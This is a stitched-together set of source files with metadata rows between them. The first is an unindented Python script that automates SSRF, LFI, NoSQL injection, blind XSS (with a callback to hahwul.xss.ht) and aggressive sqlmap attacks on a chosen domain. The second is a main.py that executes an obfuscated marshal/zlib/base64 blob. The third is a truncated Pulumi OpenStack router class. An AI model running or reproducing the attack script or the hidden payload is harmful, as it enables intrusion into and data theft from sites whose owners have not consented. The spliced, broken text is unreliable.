def ssrf():
print(BRIGHT + GREEN + "[*] " + RESET + "SSRF will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, qsreplace")
print(BRIGHT + YELLOW + "[NOTE] " + RESET + "This scan requires your burpcollaborator payload")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SSRF urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf ssrf results/urls.final >> results/urls.ssrf")
time.sleep(3)
os.system("gf ssrf results/urls.final >> results/urls.ssrf")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using qsreplace, ffuf")
ssrf_collo = input("[>] Enter your burpcollaborator payload: ")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
time.sleep(3)
os.system("cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: ffuf -c -w urls.ssrf.replaced -u FUZZ")
print(BRIGHT + GREEN + "[*] " + RESET + "Check your burpcollaborator, If there is any execution")
time.sleep(3)
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def nosqli():
print(BRIGHT + GREEN + "[*] " + RESET + "NOSQLI will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, nosqli")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SQLi urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.nosqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.nosqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Testing urls.nosqli one by one using for loops")
time.sleep(3)
with open ('results/urls.nosqli') as wordlist:
read = wordlist.readlines()
for line in read:
os.system("nosqli scan -t " + line)
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def lfi():
word = input('[>] Enter your lfi payloads file: ')
print('')
print(BRIGHT + GREEN + '[*] ' + RESET + 'One by one all urls will be tested using ffuf so be patient this could take time.')
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system('subfinder -d ' + url + '| waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ' + word + ' ; done')
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def all():
word = input('[>] Enter your lfi payloads file: ')
ssrf_collo = input("[>] Enter your burpcollaborator payload: ")
print(BRIGHT + GREEN + "[*] " + RESET + "Automating : XSS, SQLI, LFI, SSRF, NoSQLI")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SSRF urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf ssrf results/urls.final >> results/urls.ssrf")
time.sleep(3)
os.system("gf ssrf results/urls.final >> results/urls.ssrf")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf xss results/urls.final >> results/urls.xss")
time.sleep(3)
os.system("gf xss results/urls.final >> results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.sqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.sqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS using dalfox")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: dalfox -b hahwul.xss.ht file results/urls.xss")
time.sleep(3)
os.system("dalfox -b hahwul.xss.ht file results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli using sqlmap")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
time.sleep(3)
os.system("sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using qsreplace, ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
time.sleep(3)
os.system("cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: ffuf -c -w urls.ssrf.replaced -u FUZZ")
print(BRIGHT + GREEN + "[*] " + RESET + "Check your burpcollaborator, If there is any execution")
time.sleep(3)
print(BRIGHT + GREEN + "[*] " + RESET + "Testing urls.nosqli one by one using for loops")
time.sleep(3)
with open ('results/urls.nosqli') as wordlist:
read = wordlist.readlines()
for line in read:
os.system("nosqli scan -t " + line)
print(BRIGHT + GREEN + '[*] ' + RESET + 'One by one all urls will be tested using ffuf so be patient this could take time.')
os.system('subfinder -d ' + url + '| waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ' + word + ' ; done')
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
| 56.837607
| 156
| 0.621353
| 1,678
| 13,300
| 4.91478
| 0.079261
| 0.110707
| 0.147448
| 0.193525
| 0.961926
| 0.948951
| 0.948951
| 0.940948
| 0.939493
| 0.910877
| 0
| 0.004278
| 0.209023
| 13,300
| 233
| 157
| 57.081545
| 0.779658
| 0
| 0
| 0.887805
| 0
| 0.029268
| 0.504663
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029268
| false
| 0
| 0.034146
| 0
| 0.063415
| 0.409756
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
bca441ec5f578797806578abb453f2b37edf7f38
| 6,177
|
py
|
Python
|
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | 17
|
2021-01-06T16:47:18.000Z
|
2022-03-12T20:42:15.000Z
|
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | null | null | null |
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | 18
|
2021-01-07T01:59:57.000Z
|
2022-03-13T11:52:57.000Z
|
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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"))))
| 3,088.5
| 6,150
| 0.963575
| 206
| 6,177
| 28.893204
| 0.980583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164211
| 0.000324
| 6,177
| 2
| 6,150
| 3,088.5
| 0.799676
| 0
| 0
| 0
| 0
| 0.5
| 0.98608
| 0.98608
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
bcb009a8628d67b547e9074ff8d89fcfcd3aa016
| 54,401
|
py
|
Python
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RouterArgs', 'Router']
@pulumi.input_type
class RouterArgs:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input['RouterVendorOptionsArgs']] = None):
"""
The set of arguments for constructing a Router resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input['RouterVendorOptionsArgs'] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if availability_zone_hints is not None:
pulumi.set(__self__, "availability_zone_hints", availability_zone_hints)
if description is not None:
pulumi.set(__self__, "description", description)
if distributed is not None:
pulumi.set(__self__, "distributed", distributed)
if enable_snat is not None:
pulumi.set(__self__, "enable_snat", enable_snat)
if external_fixed_ips is not None:
pulumi.set(__self__, "external_fixed_ips", external_fixed_ips)
if external_gateway is not None:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
if external_gateway is not None:
pulumi.set(__self__, "external_gateway", external_gateway)
if external_network_id is not None:
pulumi.set(__self__, "external_network_id", external_network_id)
if external_subnet_ids is not None:
pulumi.set(__self__, "external_subnet_ids", external_subnet_ids)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
if vendor_options is not None:
pulumi.set(__self__, "vendor_options", vendor_options)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@availability_zone_hints.setter
def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zone_hints", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def distributed(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@distributed.setter
def distributed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "distributed", value)
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@enable_snat.setter
def enable_snat(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_snat", value)
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
